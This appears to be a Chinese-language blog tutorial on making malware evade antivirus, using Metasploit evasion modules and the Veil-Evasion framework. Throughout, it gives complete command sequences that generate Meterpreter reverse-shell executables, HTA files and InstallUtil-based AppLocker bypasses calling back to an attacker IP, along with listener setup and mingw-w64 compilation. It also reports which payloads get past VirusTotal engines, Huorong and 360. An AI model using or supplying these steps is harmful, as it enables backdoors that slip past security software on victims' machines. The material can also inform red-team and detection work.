Evasion模塊
參考鏈接:
applocker_evasion_install_util.md:
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md
基於白名單Csc.exe執行payload:https://micro8.gitbook.io/micro8/contents-1/71-80/77-ji-yu-bai-ming-dan-csc.exe-zhi-hang-payload-di-qi-ji
使用veil繞過殺軟:https://blog.csdn.net/wyf12138/article/details/79825833
免殺後門之MSF&Veil-Evasion的完美結合http://www.secist.com/archives/1107.html
APT級的全面免殺:https://xz.aliyun.com/t/4191
生成exe(VT查殺率42/71)
show evasion
use windows/windows_defender_exe
set filename test.exe
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.42.138
set LPORT 3333
run
handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_tcp
jobs
virustotal.com中42/71個報毒
火絨以及360都會攔
生成hta(VT查殺率23/58)
show evasion
use windows/windows_defender_js_hta
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.42.138
set LPORT 3333
run
handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_tcp
jobs
可以過火絨,但是不能過360(但是vt上沒報毒,所以vt上有時候並不準)
生成install_util(VT查殺率14/70)
use windows/applocker_evasion_install_util
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.138
set lport 3333
run
根據說明,需要使用csc.exe進行編譯一下,然後用InstallUtil.exe加載文件。
csc.exe是微軟.NET Framework 中的C#語言編譯器,本機安裝了.net後就可以找到該文件。我這裏用vs2019裏的csc.exe進行編譯,生成install_util.exe。
Csc.exe /out:install_util.exe c:\install_util.txt
直接執行install_util.exe是沒有任何反應的,需要使用InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe來加載。
可以成功
不過這個的應用難度比較大,需要目標機上面有.net環境,而且現今各種殺軟對.net的查殺都比較嚴重,所以應用場景一般,而且如果打包把環境拷貝的話,更是加大了木馬的體積,更容易被發現
而且在2019年1月msf5更新的不止evasion模塊,還有個更強大的模板編譯函數Metasploit::Framework::Compiler,提供了更強大的自定義免殺機制。後面文章會講述該模塊使用。
Veil免殺
Veil、Venom和Shellter是三大老牌免殺工具,雖然說人怕出名豬怕壯,但目前這幾款免殺工具在擴展性和免殺能力方面依然有着不錯的表現。
Veil-Evasion是一個用python寫的免殺框架,可以將任意腳本或一段shellcode轉換成Windows可執行文件,還能利用Metasploit框架生成相兼容的Payload工具,從而逃避了常見防病毒產品的檢測。
Veil的安裝
安裝參考:https://www.freebuf.com/sectool/89024.html
kali快速安裝
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
親身體驗過,安裝以及執行會出現各種問題,依賴包也會出現各種問題,無論是快速安裝還是常規手動安裝都沒能解決。開始以爲自己的問題,後來發現其他人也有一樣的困惑,但是也有其他人一遍成功。。。
後來,發現有人做好了veil的docker鏡像,簡單便捷,一鍵運行。
Docker安裝
apt install docker
apt install docker-compose
在kali裏安裝docker後,添加docker加速鏡像地址:
vi /etc/docker/daemon.json
{
"registry-mirrors": [
"https://1nj0zren.mirror.aliyuncs.com",
"https://docker.mirrors.ustc.edu.cn",
"http://f1361db2.m.daocloud.io",
"https://registry.docker-cn.com"
]
}
systemctl daemon-reload
systemctl restart docker
docker pull mattiasohlsson/veil
docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
-v /tmp/veil-output:/var/lib/veil/output:Z是將宿主機的/tmp/veil-output目錄映射到docker裏面,這樣veil生成的payload可以直接在宿主機裏使用。
Docker ps查看鏡像
docker exec -it a61373de85e9 /bin/bash
然後Veil命令即可進入veil的界面
veil使用
veil有兩個免殺的工具,Evasion和Ordnance。
Ordnance可生成在Veil-Evasion中使用的shellcode,Evasion是用做文件免殺。
我們一般選擇Evasion
use 1
list
推薦使用以go和ruby語言encode的編碼方式。像python這類的與用戶有較高的交互就容易被查殺。
veil原理可以參考這篇文章:https://xz.aliyun.com/t/4191
使用veil直接生成exe(VT查殺率43/69)
我們使用go語言生成msf的payload
use 15
set lhost 192.168.42.138
set lport 3334
generate
名稱:go_msf
因爲之前已經做過映射,所以在宿主機的/tmp/veil-output/compiled/目錄可直接看到生成的exe文件。
Msf中進行監聽:
use multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.42.138
set lport 3334
run
可以過火絨,但是過不了360,缺點是體積太大了,go語言生成的exe大約2M,python生成的exe大約4M,ruby生成的exe大約700K,相比msf原生態的exe大打多了。而且vt的效果:
使用veil+mingw-w64(VT查殺率4/71)
use 1
use 7 (選擇payload c/meterpreter/rev_tcp.py)
set lhost 192.168.42.138
set lport 3333
generate
生成文件名爲c_msf
這個步驟生成了一個可以被msf利用的c_msf.c,然後用mingw-w64編譯
mingw-w64的安裝可參考https://zhuanlan.zhihu.com/p/76613134
安裝完成mingw-w64之後輸入命令:
gcc c_msf.c -o c_msf.exe -lwsock32
編譯完成,然後進行測試
kali端:
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.138
set lport 3333
run
然後靶機運行編譯生成的c_msf.exe木馬
WTF!!!!!!
上線立刻掉線,搞不懂,不過過了360和火絨
而且vt效果出奇的好
這和重劍無鋒大佬的結果有很大出入,待我回去仔細研究一波(換了端口試驗了一下,不行,猜測和mingw-w64的版本有關)
如果哪位大佬試驗成功,請務必私信我,灰常感謝
veil功能還是很強大的,生成的shellcode自身免殺能力就不錯,而且支持多種語言的shellcode編譯打包,和msf及cs可以無縫對接,值得人好好研究一下。三大老牌免殺工具不是浪得虛名的~~